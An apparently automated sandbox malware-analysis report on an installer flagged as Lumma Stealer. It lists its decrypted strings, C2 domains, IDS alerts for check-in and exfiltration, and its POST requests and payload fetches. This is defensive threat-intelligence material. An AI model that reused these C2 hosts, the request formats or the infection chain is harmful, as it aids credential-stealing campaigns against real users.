        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: nearycrepso.shop
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: yokesandusj.sbs
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmpString decryptor: hRjzG3--TRON
        Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49842 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49846 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49853 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49860 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49867 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49877 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49888 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49897 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49910 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49920 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.5:49927 version: TLS 1.2
        Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2553928268.0000000002699000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb| source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbT\ source: powershell.exe, 00000011.00000002.2558473325.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ilit.pdb source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000031.00000002.3131750928.000000003884C000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3131874592.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000031.00000002.3131750928.000000003884C000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3131874592.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2553928268.0000000002699000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49846 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49846 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49853 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49842 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49842 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49910 -> 104.21.44.159:443
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: framekgirus.shop
        Source: Malware configuration extractorURLs: yokesandusj.sbs
        Source: Malware configuration extractorURLs: cloudewahsj.shop
        Source: Malware configuration extractorURLs: tirepublicerj.shop
        Source: Malware configuration extractorURLs: noisycuttej.shop
        Source: Malware configuration extractorURLs: wholersorie.shop
        Source: Malware configuration extractorURLs: rabidcowse.shop
        Source: Malware configuration extractorURLs: nearycrepso.shop
        Source: Malware configuration extractorURLs: abruptyopsn.shop
        Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
        Source: Joe Sandbox ViewIP Address: 172.67.208.58 172.67.208.58
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49842 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49860 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49877 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49867 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49888 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49897 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49846 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49853 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49910 -> 104.21.44.159:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49920 -> 185.161.251.21:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49927 -> 172.67.208.58:443
        Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.5:49927
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: yokesandusj.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: yokesandusj.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=45GPJ30OVSS5KLSQSAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12834Host: yokesandusj.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UMB2YZ25PIS3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15040Host: yokesandusj.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NR43MFZ36ZVA6THUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20548Host: yokesandusj.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KOQNT3SGI296IF2QAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7139Host: yokesandusj.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T8MBODCY143BWRCL3J3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1257Host: yokesandusj.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y2BM2JBPEECLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 593404Host: yokesandusj.sbs
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: yokesandusj.sbs
        Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
        Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
        Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
        Source: global trafficDNS traffic detected: DNS query: iqEcklosdyCxilSwLDOcKOPdDDq.iqEcklosdyCxilSwLDOcKOPdDDq
        Source: global trafficDNS traffic detected: DNS query: yokesandusj.sbs
        Source: global trafficDNS traffic detected: DNS query: cegu.shop
        Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
        Source: global trafficDNS traffic detected: DNS query: dfgh.online
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: yokesandusj.sbs
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, M.com.2.dr, Enable.9.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
        Source: Setup.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, M.com.2.dr, Enable.9.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: Setup.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, M.com.2.dr, Enable.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, M.com.2.dr, Enable.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, M.com.2.dr, Enable.9.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/Sectig
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
        Source: BrightLib.exe, 00000031.00000000.3070273332.0000000000AEE000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000031.00000002.3111411093.0000000001050000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3111928278.0000000003370000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3112485410.00000000063F8000.00000004.00000020.00020000.00000000.sdmp, is-STFPD.tmp.22.drString found in binary or memory: http://michaeluno.jp/
        Source: BrightLib.exe, 00000031.00000002.3111928278.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://michaeluno.jp/H
        Source: Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, M.com.2.dr, Enable.9.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
        Source: Setup.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
        Source: Setup.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
        Source: Setup.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://ocsp.sectigo.com0
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://ocsp.securetrust.com/0?
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://ocsp.trustwave.com/06
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://ocsp.vikingcloud.com/0:
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://ocsp.vikingcloud.com/0A
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, M.com.2.dr, Enable.9.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, M.com.2.dr, Enable.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, M.com.2.dr, Enable.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
        Source: powershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
        Source: powershell.exe, 00000011.00000002.2554947823.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Setup.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, M.com.2.dr, Enable.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: Setup.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, M.com.2.dr, Enable.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
        Source: Setup.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://subca.ocsp-certum.com01
        Source: powershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: BrightLib.exe, 00000031.00000000.3070150341.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000031.00000002.3110718350.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-STFPD.tmp.22.drString found in binary or memory: http://www.autohotkey.com
        Source: BrightLib.exe, 00000031.00000000.3070150341.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000031.00000002.3110718350.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-STFPD.tmp.22.drString found in binary or memory: http://www.autohotkey.comCould
        Source: M.com, 0000000D.00000000.2072998338.0000000000A05000.00000002.00000001.01000000.00000007.sdmp, M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, Chancellor.9.dr, M.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://www.certum.pl/CPS0
        Source: BrightLib.exe, 00000031.00000002.3132032526.0000000039D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: powershell.exe, 00000011.00000002.2554947823.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: https://certs.securetrust.com/CA0
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: https://certs.securetrust.com/CA05
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: https://certs.securetrust.com/CA0:
        Source: M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
